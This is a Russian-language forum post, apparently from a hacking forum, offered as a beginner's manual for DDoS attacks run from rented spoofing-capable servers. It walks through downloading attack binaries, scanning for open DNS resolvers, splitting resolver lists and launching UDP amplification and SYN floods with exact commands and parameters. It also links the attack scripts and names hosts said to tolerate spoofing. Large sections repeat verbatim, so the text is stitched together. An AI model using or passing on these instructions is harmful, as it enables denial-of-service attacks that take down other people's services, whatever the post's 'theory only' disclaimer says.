Admin
Администратор
Автор статьи paran0id никаких побуждений к действию в ней не содержится. Все лишь в теории и для ознакомления!
Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!
Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:
- нет нормальных загрузок, продают в основном одно говно в сто рук
- нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки
- из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно
- средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.
Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса)
В основном это upd amplification и syn flood, который в nix благо может быть реализован.
В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки.
Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент.
Сначала установим glibc необходимый для работы скриптов:
yum install glibc.i686 если centos
apt-get install glibc.i686 если debian
Далее заливаем udp, syn и scan на сервер через фтп клиент или
wget http://host.com/udp и тд.
Ставим на них права 777 в фтп клиенте или
chmod -R 777 syn
На этом пока все, теперь переходим к днс листам.
Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.
Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.
На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.
Пример использования:
./scan 1 99999 list.txt 3 admin.gull.ca 3800
Где:
1 - начало диапазона
99999 - конец диапазона
list.txt - файл куда будут сохранятся днски
3 - количество потоков, 3 как раз на гигабитный канал
admin.gull.ca - домен для скана с кучей А записей
3800 - размер ответа в байтах.
Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:
http://dnsamplificationattacks.blogspot.com/
Проверяем их командой dig:
dig A admin.gull.ca
или
dig ANY admin.gull.ca
Если ответ 3800+ - смело сканим на этот домен.
И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.
Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:
split list.txt 3532804
И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.
Теперь берем эти листы и распределяем по серверам.
Можете другой утилиткой это делать, главное принцип понятен.
Готово? Можно ддосить
Udp flood запускаем так:
./udp 121.2.2.10 80 list.txt 99 1000
80 - порт
list.txt - лист наш естественно
99 - количетсво потоков, больше 100 ставить не рекомендую
1000 - длительность атаки в секундах
Syn flood запускаем так:
./syn 121.2.2.10 21 100 -1 1000
21 - порт
100 - количество потоков, больше 100 тоже не стоит ставить
-1 - лимит pps, то есть -1 это без лимита
1000 - длительность атаки в секундах
Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.
Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
Да, все делается ручками, это вам не штормбот
. Зато на халяву
Надеюсь информация эта будет кому нибудь полезна, если хоть один чел отсюда узнает что то для себя новое - значит я не зря все это писал
.
Если что то интересует, спрашивайте, дополню расскажу подскажу разжую помогу. Успехов, дедосеры
Вот несколько дц где еще можно купить сервера со спуфингом:
hxxp://www.servermania.com/
hxxp://www.us.unmetered.com/
hxxp://unit-is.com/
Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!
Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:
- нет нормальных загрузок, продают в основном одно говно в сто рук
- нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки
- из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно
- средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.
Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса)
В основном это upd amplification и syn flood, который в nix благо может быть реализован.
В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки.
- SSH клиент, для отдачи команд серверам. Рекомендую xshell
Скачать: http://www.netsarang.com/download/down_xsh.html
- FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее
- Утилитка для разделения txt файла на части. Я использовал split
Скачать: http://www.sendspace.com/file/4ai08a
- Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования) Скриты могу позже выложить побольше)
Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF...x_nVoVzENC7LeEA
- Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.
Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.
Скачать: http://www.netsarang.com/download/down_xsh.html
- FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее
- Утилитка для разделения txt файла на части. Я использовал split
Скачать: http://www.sendspace.com/file/4ai08a
- Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования) Скриты могу позже выложить побольше)
Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF...x_nVoVzENC7LeEA
- Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.
Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.
Сначала установим glibc необходимый для работы скриптов:
yum install glibc.i686 если centos
apt-get install glibc.i686 если debian
Далее заливаем udp, syn и scan на сервер через фтп клиент или
wget http://host.com/udp и тд.
Ставим на них права 777 в фтп клиенте или
chmod -R 777 syn
На этом пока все, теперь переходим к днс листам.
Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.
Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.
На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.
Пример использования:
./scan 1 99999 list.txt 3 admin.gull.ca 3800
Где:
1 - начало диапазона
99999 - конец диапазона
list.txt - файл куда будут сохранятся днски
3 - количество потоков, 3 как раз на гигабитный канал
admin.gull.ca - домен для скана с кучей А записей
3800 - размер ответа в байтах.
Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:
http://dnsamplificationattacks.blogspot.com/
Проверяем их командой dig:
dig A admin.gull.ca
или
dig ANY admin.gull.ca
Если ответ 3800+ - смело сканим на этот домен.
И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.
Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:
split list.txt 3532804
И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.
Теперь берем эти листы и распределяем по серверам.
Можете другой утилиткой это делать, главное принцип понятен.
Готово? Можно ддосить
Udp flood запускаем так:
./udp 121.2.2.10 80 list.txt 99 1000
80 - порт
list.txt - лист наш естественно
99 - количетсво потоков, больше 100 ставить не рекомендую
1000 - длительность атаки в секундах
Syn flood запускаем так:
./syn 121.2.2.10 21 100 -1 1000
21 - порт
100 - количество потоков, больше 100 тоже не стоит ставить
-1 - лимит pps, то есть -1 это без лимита
1000 - длительность атаки в секундах
Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.
Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
Да, все делается ручками, это вам не штормбот
Надеюсь информация эта будет кому нибудь полезна, если хоть один чел отсюда узнает что то для себя новое - значит я не зря все это писал
Если что то интересует, спрашивайте, дополню расскажу подскажу разжую помогу. Успехов, дедосеры
Вот несколько дц где еще можно купить сервера со спуфингом:
hxxp://www.servermania.com/
hxxp://www.us.unmetered.com/
hxxp://unit-is.com/
